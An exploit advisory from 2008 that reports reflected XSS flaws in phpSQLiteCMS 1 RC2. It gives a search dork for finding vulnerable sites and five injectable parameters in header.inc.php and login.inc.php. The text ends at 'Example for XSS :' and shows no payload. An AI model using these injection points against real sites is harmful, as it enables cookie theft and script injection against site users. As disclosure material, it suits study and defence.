========================================================== phpSQLiteCMS Multiple Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 21 May 2008 SITE : www.citec.us ##################################################### APPLICATION : phpSQLiteCMS VERSION : 1 RC2 (Lastest Version) VENDOR : http://downloads.sourceforge.net/phpsqlitecms ##################################################### DORK: "Powered By phpSQLiteCMS" ---Exploit--- [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]= [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]= [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]= [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]= [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]= Example for XSS :